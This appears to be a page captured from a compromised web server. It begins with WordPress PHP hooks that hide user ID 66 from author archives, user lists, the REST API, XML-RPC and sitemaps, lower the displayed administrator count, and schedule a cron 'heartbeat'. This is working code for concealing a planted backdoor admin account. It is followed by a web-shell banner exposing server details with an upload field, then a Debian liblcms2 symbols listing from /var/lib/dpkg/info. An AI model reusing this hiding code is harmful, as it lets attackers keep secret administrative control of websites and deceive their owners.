add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
liblcms2.so.2 liblcms2-2 #MINVER# * Build-Depends-Package: liblcms2-dev _cms15Fixed16toDouble@Base 2.2+git20110628 _cms8Fixed8toDouble@Base 2.2+git20110628 _cmsAdjustEndianess16@Base 2.2+git20110628 _cmsAdjustEndianess32@Base 2.2+git20110628 _cmsAdjustEndianess64@Base 2.2+git20110628 _cmsCalloc@Base 2.2+git20110628 _cmsComputeInterpParams@Base 2.2+git20110628 _cmsCreateMutex@Base 2.6 _cmsDecodeDateTimeNumber@Base 2.2+git20110628 _cmsDefaultICCintents@Base 2.2+git20110628 _cmsDestroyMutex@Base 2.6 _cmsDoubleTo15Fixed16@Base 2.2+git20110628 _cmsDoubleTo8Fixed8@Base 2.2+git20110628 _cmsDupMem@Base 2.2+git20110628 _cmsEncodeDateTimeNumber@Base 2.2+git20110628 _cmsFloat2Half@Base 2.4 _cmsFree@Base 2.2+git20110628 _cmsFreeInterpParams@Base 2.2+git20110628 _cmsGetFormatter@Base 2.2+git20110628 _cmsGetTransformFlags@Base 2.12~rc1 _cmsGetTransformFormatters16@Base 2.4 _cmsGetTransformFormattersFloat@Base 2.4 _cmsGetTransformMaxWorkers@Base 2.14 _cmsGetTransformUserData@Base 2.4 _cmsGetTransformWorker@Base 2.14 _cmsGetTransformWorkerFlags@Base 2.14 _cmsHalf2Float@Base 2.4 _cmsICCcolorSpace@Base 2.2+git20110628 _cmsIOPrintf@Base 2.2+git20110628 _cmsLCMScolorSpace@Base 2.2+git20110628 _cmsLockMutex@Base 2.6 _cmsMAT3eval@Base 2.2+git20110628 _cmsMAT3identity@Base 2.2+git20110628 _cmsMAT3inverse@Base 2.2+git20110628 _cmsMAT3isIdentity@Base 2.2+git20110628 _cmsMAT3per@Base 2.2+git20110628 _cmsMAT3solve@Base 2.2+git20110628 _cmsMalloc@Base 2.2+git20110628 _cmsMallocZero@Base 2.2+git20110628 _cmsOptimizePipeline@Base 2.12~rc1 _cmsPipelineSetOptimizationParameters@Base 2.2+git20110628 _cmsQuantizeVal@Base 2.2+git20110628 _cmsRead15Fixed16Number@Base 2.2+git20110628 _cmsReadAlignment@Base 2.2+git20110628 _cmsReadDevicelinkLUT@Base 2.2+git20110628 _cmsReadFloat32Number@Base 2.2+git20110628 _cmsReadInputLUT@Base 2.2+git20110628 _cmsReadOutputLUT@Base 2.2+git20110628 _cmsReadTypeBase@Base 2.2+git20110628 _cmsReadUInt16Array@Base 2.2+git20110628 _cmsReadUInt16Number@Base 2.2+git20110628 _cmsReadUInt32Number@Base 2.2+git20110628 _cmsReadUInt64Number@Base 2.2+git20110628 _cmsReadUInt8Number@Base 2.2+git20110628 _cmsReadXYZNumber@Base 2.2+git20110628 _cmsRealloc@Base 2.2+git20110628 _cmsReasonableGridpointsByColorspace@Base 2.12~rc1 _cmsSetTransformUserData@Base 2.4 _cmsStageAllocIdentityCLut@Base 2.2+git20110628 _cmsStageAllocIdentityCurves@Base 2.2+git20110628 _cmsStageAllocLab2XYZ@Base 2.2+git20110628 _cmsStageAllocLabV2ToV4@Base 2.2+git20110628 _cmsStageAllocLabV4ToV2@Base 2.2+git20110628 _cmsStageAllocNamedColor@Base 2.2+git20110628 _cmsStageAllocPlaceholder@Base 2.2+git20110628 _cmsStageAllocXYZ2Lab@Base 2.2+git20110628 _cmsUnlockMutex@Base 2.6 _cmsVEC3cross@Base 2.2+git20110628 _cmsVEC3distance@Base 2.2+git20110628 _cmsVEC3dot@Base 2.2+git20110628 _cmsVEC3init@Base 2.2+git20110628 _cmsVEC3length@Base 2.2+git20110628 _cmsVEC3minus@Base 2.2+git20110628 _cmsWrite15Fixed16Number@Base 2.2+git20110628 _cmsWriteAlignment@Base 2.2+git20110628 _cmsWriteFloat32Number@Base 2.2+git20110628 _cmsWriteTypeBase@Base 2.2+git20110628 _cmsWriteUInt16Array@Base 2.2+git20110628 _cmsWriteUInt16Number@Base 2.2+git20110628 _cmsWriteUInt32Number@Base 2.2+git20110628 _cmsWriteUInt64Number@Base 2.2+git20110628 _cmsWriteUInt8Number@Base 2.2+git20110628 _cmsWriteXYZNumber@Base 2.2+git20110628 cmsAdaptToIlluminant@Base 2.2+git20110628 cmsAllocNamedColorList@Base 2.2+git20110628 cmsAllocProfileSequenceDescription@Base 2.2+git20110628 cmsAppendNamedColor@Base 2.2+git20110628 cmsBFDdeltaE@Base 2.2+git20110628 cmsBuildGamma@Base 2.2+git20110628 cmsBuildParametricToneCurve@Base 2.2+git20110628 cmsBuildSegmentedToneCurve@Base 2.2+git20110628 cmsBuildTabulatedToneCurve16@Base 2.2+git20110628 cmsBuildTabulatedToneCurveFloat@Base 2.2+git20110628 cmsCIE2000DeltaE@Base 2.2+git20110628 cmsCIE94DeltaE@Base 2.2+git20110628 cmsCIECAM02Done@Base 2.2+git20110628 cmsCIECAM02Forward@Base 2.2+git20110628 cmsCIECAM02Init@Base 2.2+git20110628 cmsCIECAM02Reverse@Base 2.2+git20110628 cmsCMCdeltaE@Base 2.2+git20110628 cmsChangeBuffersFormat@Base 2.2+git20110628 cmsChannelsOf@Base 2.2+git20110628 cmsChannelsOfColorSpace@Base 2.14 cmsCloseIOhandler@Base 2.2+git20110628 cmsCloseProfile@Base 2.2+git20110628 cmsCreateBCHSWabstractProfile@Base 2.2+git20110628 cmsCreateBCHSWabstractProfileTHR@Base 2.2+git20110628 cmsCreateContext@Base 2.6 cmsCreateExtendedTransform@Base 2.2+git20110628 cmsCreateGrayProfile@Base 2.2+git20110628 cmsCreateGrayProfileTHR@Base 2.2+git20110628 cmsCreateInkLimitingDeviceLink@Base 2.2+git20110628 cmsCreateInkLimitingDeviceLinkTHR@Base 2.2+git20110628 cmsCreateLab2Profile@Base 2.2+git20110628 cmsCreateLab2ProfileTHR@Base 2.2+git20110628 cmsCreateLab4Profile@Base 2.2+git20110628 cmsCreateLab4ProfileTHR@Base 2.2+git20110628 cmsCreateLinearizationDeviceLink@Base 2.2+git20110628 cmsCreateLinearizationDeviceLinkTHR@Base 2.2+git20110628 cmsCreateMultiprofileTransform@Base 2.2+git20110628 cmsCreateMultiprofileTransformTHR@Base 2.2+git20110628 cmsCreateNULLProfile@Base 2.2+git20110628 cmsCreateNULLProfileTHR@Base 2.2+git20110628 cmsCreateProfilePlaceholder@Base 2.2+git20110628 cmsCreateProofingTransform@Base 2.2+git20110628 cmsCreateProofingTransformTHR@Base 2.2+git20110628 cmsCreateRGBProfile@Base 2.2+git20110628 cmsCreateRGBProfileTHR@Base 2.2+git20110628 cmsCreateTransform@Base 2.2+git20110628 cmsCreateTransformTHR@Base 2.2+git20110628 cmsCreateXYZProfile@Base 2.2+git20110628 cmsCreateXYZProfileTHR@Base 2.2+git20110628 cmsCreate_sRGBProfile@Base 2.2+git20110628 cmsCreate_sRGBProfileTHR@Base 2.2+git20110628 cmsD50_XYZ@Base 2.2+git20110628 cmsD50_xyY@Base 2.2+git20110628 cmsDeleteContext@Base 2.6 cmsDeleteTransform@Base 2.2+git20110628 cmsDeltaE@Base 2.2+git20110628 cmsDesaturateLab@Base 2.2+git20110628 cmsDetectBlackPoint@Base 2.2+git20110628 cmsDetectDestinationBlackPoint@Base 2.4 cmsDetectRGBProfileGamma@Base 2.13 cmsDetectTAC@Base 2.2+git20110628 cmsDictAddEntry@Base 2.2+git20110628 cmsDictAlloc@Base 2.2+git20110628 cmsDictDup@Base 2.2+git20110628 cmsDictFree@Base 2.2+git20110628 cmsDictGetEntryList@Base 2.2+git20110628 cmsDictNextEntry@Base 2.2+git20110628 cmsDoTransform@Base 2.2+git20110628 cmsDoTransformLineStride@Base 2.8 cmsDoTransformStride@Base 2.4 cmsDupContext@Base 2.6 cmsDupNamedColorList@Base 2.2+git20110628 cmsDupProfileSequenceDescription@Base 2.2+git20110628 cmsDupToneCurve@Base 2.2+git20110628 cmsEstimateGamma@Base 2.2+git20110628 cmsEvalToneCurve16@Base 2.2+git20110628 cmsEvalToneCurveFloat@Base 2.2+git20110628 cmsFloat2LabEncoded@Base 2.2+git20110628 cmsFloat2LabEncodedV2@Base 2.2+git20110628 cmsFloat2XYZEncoded@Base 2.2+git20110628 cmsFormatterForColorspaceOfProfile@Base 2.2+git20110628 cmsFormatterForPCSOfProfile@Base 2.2+git20110628 cmsFreeNamedColorList@Base 2.2+git20110628 cmsFreeProfileSequenceDescription@Base 2.2+git20110628 cmsFreeToneCurve@Base 2.2+git20110628 cmsFreeToneCurveTriple@Base 2.2+git20110628 cmsGBDAlloc@Base 2.2+git20110628 cmsGBDFree@Base 2.2+git20110628 cmsGDBAddPoint@Base 2.2+git20110628 cmsGDBCheckPoint@Base 2.2+git20110628 cmsGDBCompute@Base 2.2+git20110628 cmsGetAlarmCodes@Base 2.2+git20110628 cmsGetAlarmCodesTHR@Base 2.6 cmsGetColorSpace@Base 2.2+git20110628 cmsGetContextUserData@Base 2.6 cmsGetDeviceClass@Base 2.2+git20110628 cmsGetEncodedCMMversion@Base 2.7 cmsGetEncodedICCversion@Base 2.2+git20110628 cmsGetHeaderAttributes@Base 2.2+git20110628 cmsGetHeaderCreationDateTime@Base 2.2+git20110628 cmsGetHeaderCreator@Base 2.5 cmsGetHeaderFlags@Base 2.2+git20110628 cmsGetHeaderManufacturer@Base 2.2+git20110628 cmsGetHeaderModel@Base 2.2+git20110628 cmsGetHeaderProfileID@Base 2.2+git20110628 cmsGetHeaderRenderingIntent@Base 2.2+git20110628 cmsGetNamedColorList@Base 2.2+git20110628 cmsGetPCS@Base 2.2+git20110628 cmsGetPipelineContextID@Base 2.4 cmsGetPostScriptCRD@Base 2.2+git20110628 cmsGetPostScriptCSA@Base 2.2+git20110628 cmsGetPostScriptColorResource@Base 2.2+git20110628 cmsGetProfileContextID@Base 2.2+git20110628 cmsGetProfileIOhandler@Base 2.7 cmsGetProfileInfo@Base 2.2+git20110628 cmsGetProfileInfoASCII@Base 2.2+git20110628 cmsGetProfileVersion@Base 2.2+git20110628 cmsGetStageContextID@Base 2.13 cmsGetSupportedIntents@Base 2.2+git20110628 cmsGetSupportedIntentsTHR@Base 2.6 cmsGetTagCount@Base 2.2+git20110628 cmsGetTagSignature@Base 2.2+git20110628 cmsGetToneCurveEstimatedTable@Base 2.4 cmsGetToneCurveEstimatedTableEntries@Base 2.4 cmsGetToneCurveParametricType@Base 2.2+git20110628 cmsGetToneCurveParams@Base 2.12~rc1 cmsGetTransformContextID@Base 2.2+git20110628 cmsGetTransformInputFormat@Base 2.2+git20110628 cmsGetTransformOutputFormat@Base 2.2+git20110628 cmsIT8Alloc@Base 2.2+git20110628 cmsIT8DefineDblFormat@Base 2.2+git20110628 cmsIT8EnumDataFormat@Base 2.2+git20110628 cmsIT8EnumProperties@Base 2.2+git20110628 cmsIT8EnumPropertyMulti@Base 2.2+git20110628 cmsIT8FindDataFormat@Base 2.2+git20110628 cmsIT8Free@Base 2.2+git20110628 cmsIT8GetData@Base 2.2+git20110628 cmsIT8GetDataDbl@Base 2.2+git20110628 cmsIT8GetDataRowCol@Base 2.2+git20110628 cmsIT8GetDataRowColDbl@Base 2.2+git20110628 cmsIT8GetPatchByName@Base 2.2+git20110628 cmsIT8GetPatchName@Base 2.2+git20110628 cmsIT8GetProperty@Base 2.2+git20110628 cmsIT8GetPropertyDbl@Base 2.2+git20110628 cmsIT8GetPropertyMulti@Base 2.2+git20110628 cmsIT8GetSheetType@Base 2.2+git20110628 cmsIT8LoadFromFile@Base 2.2+git20110628 cmsIT8LoadFromMem@Base 2.2+git20110628 cmsIT8SaveToFile@Base 2.2+git20110628 cmsIT8SaveToMem@Base 2.2+git20110628 cmsIT8SetComment@Base 2.2+git20110628 cmsIT8SetData@Base 2.2+git20110628 cmsIT8SetDataDbl@Base 2.2+git20110628 cmsIT8SetDataFormat@Base 2.2+git20110628 cmsIT8SetDataRowCol@Base 2.2+git20110628 cmsIT8SetDataRowColDbl@Base 2.2+git20110628 cmsIT8SetIndexColumn@Base 2.2+git20110628 cmsIT8SetPropertyDbl@Base 2.2+git20110628 cmsIT8SetPropertyHex@Base 2.2+git20110628 cmsIT8SetPropertyMulti@Base 2.2+git20110628 cmsIT8SetPropertyStr@Base 2.2+git20110628 cmsIT8SetPropertyUncooked@Base 2.2+git20110628 cmsIT8SetSheetType@Base 2.2+git20110628 cmsIT8SetTable@Base 2.2+git20110628 cmsIT8SetTableByLabel@Base 2.2+git20110628 cmsIT8TableCount@Base 2.2+git20110628 cmsIsCLUT@Base 2.2+git20110628 cmsIsIntentSupported@Base 2.2+git20110628 cmsIsMatrixShaper@Base 2.2+git20110628 cmsIsTag@Base 2.2+git20110628 cmsIsToneCurveDescending@Base 2.2+git20110628 cmsIsToneCurveLinear@Base 2.2+git20110628 cmsIsToneCurveMonotonic@Base 2.2+git20110628 cmsIsToneCurveMultisegment@Base 2.2+git20110628 cmsJoinToneCurve@Base 2.2+git20110628 cmsLCh2Lab@Base 2.2+git20110628 cmsLab2LCh@Base 2.2+git20110628 cmsLab2XYZ@Base 2.2+git20110628 cmsLabEncoded2Float@Base 2.2+git20110628 cmsLabEncoded2FloatV2@Base 2.2+git20110628 cmsLinkTag@Base 2.2+git20110628 cmsMD5add@Base 2.12~rc1 cmsMD5alloc@Base 2.12~rc1 cmsMD5computeID@Base 2.2+git20110628 cmsMD5finish@Base 2.12~rc1 cmsMLUalloc@Base 2.2+git20110628 cmsMLUdup@Base 2.2+git20110628 cmsMLUfree@Base 2.2+git20110628 cmsMLUgetASCII@Base 2.2+git20110628 cmsMLUgetTranslation@Base 2.2+git20110628 cmsMLUgetWide@Base 2.2+git20110628 cmsMLUsetASCII@Base 2.2+git20110628 cmsMLUsetWide@Base 2.2+git20110628 cmsMLUtranslationsCodes@Base 2.5 cmsMLUtranslationsCount@Base 2.5 cmsNamedColorCount@Base 2.2+git20110628 cmsNamedColorIndex@Base 2.2+git20110628 cmsNamedColorInfo@Base 2.2+git20110628 cmsOpenIOhandlerFromFile@Base 2.2+git20110628 cmsOpenIOhandlerFromMem@Base 2.2+git20110628 cmsOpenIOhandlerFromNULL@Base 2.2+git20110628 cmsOpenIOhandlerFromStream@Base 2.2+git20110628 cmsOpenProfileFromFile@Base 2.2+git20110628 cmsOpenProfileFromFileTHR@Base 2.2+git20110628 cmsOpenProfileFromIOhandler2THR@Base 2.6 cmsOpenProfileFromIOhandlerTHR@Base 2.2+git20110628 cmsOpenProfileFromMem@Base 2.2+git20110628 cmsOpenProfileFromMemTHR@Base 2.2+git20110628 cmsOpenProfileFromStream@Base 2.2+git20110628 cmsOpenProfileFromStreamTHR@Base 2.2+git20110628 cmsPipelineAlloc@Base 2.2+git20110628 cmsPipelineCat@Base 2.2+git20110628 cmsPipelineCheckAndRetreiveStages@Base 2.2+git20110628 cmsPipelineDup@Base 2.2+git20110628 cmsPipelineEval16@Base 2.2+git20110628 cmsPipelineEvalFloat@Base 2.2+git20110628 cmsPipelineEvalReverseFloat@Base 2.2+git20110628 cmsPipelineFree@Base 2.2+git20110628 cmsPipelineGetPtrToFirstStage@Base 2.2+git20110628 cmsPipelineGetPtrToLastStage@Base 2.2+git20110628 cmsPipelineInputChannels@Base 2.2+git20110628 cmsPipelineInsertStage@Base 2.2+git20110628 cmsPipelineOutputChannels@Base 2.2+git20110628 cmsPipelineSetSaveAs8bitsFlag@Base 2.2+git20110628 cmsPipelineStageCount@Base 2.2+git20110628 cmsPipelineUnlinkStage@Base 2.2+git20110628 cmsPlugin@Base 2.2+git20110628 cmsPluginTHR@Base 2.5 cmsReadRawTag@Base 2.2+git20110628 cmsReadTag@Base 2.2+git20110628 cmsReverseToneCurve@Base 2.2+git20110628 cmsReverseToneCurveEx@Base 2.2+git20110628 cmsSaveProfileToFile@Base 2.2+git20110628 cmsSaveProfileToIOhandler@Base 2.2+git20110628 cmsSaveProfileToMem@Base 2.2+git20110628 cmsSaveProfileToStream@Base 2.2+git20110628 cmsSetAdaptationState@Base 2.2+git20110628 cmsSetAdaptationStateTHR@Base 2.6 cmsSetAlarmCodes@Base 2.2+git20110628 cmsSetAlarmCodesTHR@Base 2.6 cmsSetColorSpace@Base 2.2+git20110628 cmsSetDeviceClass@Base 2.2+git20110628 cmsSetEncodedICCversion@Base 2.2+git20110628 cmsSetHeaderAttributes@Base 2.2+git20110628 cmsSetHeaderFlags@Base 2.2+git20110628 cmsSetHeaderManufacturer@Base 2.2+git20110628 cmsSetHeaderModel@Base 2.2+git20110628 cmsSetHeaderProfileID@Base 2.2+git20110628 cmsSetHeaderRenderingIntent@Base 2.2+git20110628 cmsSetLogErrorHandler@Base 2.2+git20110628 cmsSetLogErrorHandlerTHR@Base 2.6 cmsSetPCS@Base 2.2+git20110628 cmsSetProfileVersion@Base 2.2+git20110628 cmsSignalError@Base 2.2+git20110628 cmsSliceSpace16@Base 2.2+git20110628 cmsSliceSpaceFloat@Base 2.2+git20110628 cmsSmoothToneCurve@Base 2.2+git20110628 cmsStageAllocCLut16bit@Base 2.2+git20110628 cmsStageAllocCLut16bitGranular@Base 2.2+git20110628 cmsStageAllocCLutFloat@Base 2.2+git20110628 cmsStageAllocCLutFloatGranular@Base 2.2+git20110628 cmsStageAllocIdentity@Base 2.2+git20110628 cmsStageAllocMatrix@Base 2.2+git20110628 cmsStageAllocToneCurves@Base 2.2+git20110628 cmsStageData@Base 2.2+git20110628 cmsStageDup@Base 2.2+git20110628 cmsStageFree@Base 2.2+git20110628 cmsStageInputChannels@Base 2.2+git20110628 cmsStageNext@Base 2.2+git20110628 cmsStageOutputChannels@Base 2.2+git20110628 cmsStageSampleCLut16bit@Base 2.2+git20110628 cmsStageSampleCLutFloat@Base 2.2+git20110628 cmsStageType@Base 2.2+git20110628 cmsTagLinkedTo@Base 2.2+git20110628 cmsTempFromWhitePoint@Base 2.2+git20110628 cmsTransform2DeviceLink@Base 2.2+git20110628 cmsUnregisterPlugins@Base 2.2+git20110628 cmsUnregisterPluginsTHR@Base 2.6 cmsWhitePointFromTemp@Base 2.2+git20110628 cmsWriteRawTag@Base 2.2+git20110628 cmsWriteTag@Base 2.2+git20110628 cmsXYZ2Lab@Base 2.2+git20110628 cmsXYZ2xyY@Base 2.2+git20110628 cmsXYZEncoded2Float@Base 2.2+git20110628 cmsfilelength@Base 2.2+git20110628 cmsstrcasecmp@Base 2.2+git20110628 cmsxyY2XYZ@Base 2.2+git20110628